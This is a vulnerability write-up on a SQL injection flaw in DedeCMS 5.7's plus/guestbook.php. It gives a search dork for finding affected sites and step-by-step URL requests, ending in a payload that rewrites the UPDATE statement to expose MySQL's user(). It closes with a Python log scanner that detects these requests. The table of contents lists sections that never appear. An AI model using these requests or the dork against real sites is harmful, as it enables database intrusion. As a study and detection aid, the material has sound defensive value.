1. Vulnerability description
2. Vulnerability trigger conditions
3. Vulnerability scope
4. Vulnerability code analysis
5. Defense method
6. Offensive and defensive thinking
1. Vulnerability description
Successful injection requires all of the following conditions:
1. PHP is configured with magic_quotes_gpc=off.
2. The vulnerable file exists: plus/guestbook.php
3. The dede_guestbook table must also exist in the database.
Relevant Link:
inurl:/plus/guestbook.php
2. Vulnerability trigger condition
1. Access: http://localhost/dedecms5.7/plus/guestbook.php
2. The [Reply/edit] link shows the visitor message ID. Write down the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
3. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=1
4. After submitting, on the dede 5.7 version the page shows "successfully changed or replying to a message", which proves that the modification was successful.
5. Return to http://localhost/dedecms5.7/plus/guestbook.php and check whether the content of the message you modified has changed to errs.cc'. If it has, the quote was stored as ordinary data and the vulnerability cannot be exploited, because the php magic_quotes_gpc=off condition is not met.
6. If the modification did not succeed and the content of that message ID is still the previous content, the vulnerability can be exploited.
7. Then visit: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=',msg=user(),email='
8. Return again: the content of that message ID has been changed directly to the value of MySQL user().
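A detection sketch for the request pattern in the steps above, added here as an example (it is not code from the original page or from DedeCMS): it scans web access logs for `job=editok` requests to plus/guestbook.php whose `msg` parameter carries a single quote, and rates a quote followed by a column assignment higher than a bare quote. The log lines are constructed, and the combined log format, the severity labels and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format assumed), for illustration only.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /plus/guestbook.php HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /plus/guestbook.php?action=admin&id=1 HTTP/1.1" 200 2048
198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /plus/guestbook.php?action=admin&job=editok&msg=errs.cc%27&id=1 HTTP/1.1" 200 812
198.51.100.7 - - [01/Jan/2024:10:00:31 +0000] "GET /plus/guestbook.php?action=admin&job=editok&id=1&msg=%27,msg=user(),email=%27 HTTP/1.1" 200 812
203.0.113.20 - - [01/Jan/2024:10:05:00 +0000] "GET /plus/guestbook.php?action=admin&job=editok&msg=thanks&id=4 HTTP/1.1" 200 812
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A quote followed by ", column =" means the value is rewriting the SET clause.
SET_REWRITE = re.compile(r"'\s*,\s*\w+\s*=")

def classify(line):
    """Return (client, severity, reason) for a suspicious editok request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/plus/guestbook.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also decodes %27
    if "editok" not in params.get("job", []):
        return None
    for msg in params.get("msg", []):
        if SET_REWRITE.search(msg):
            return (client, "high", "msg rewrites the SET clause")
        if "'" in msg:
            return (client, "medium", "msg carries a single quote")
    return None

def scan(log_text):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A legitimate message containing an apostrophe also produces a medium hit, so treat that level as a triage signal; parameters sent in a POST body do not appear in access logs and need WAF or application logging instead.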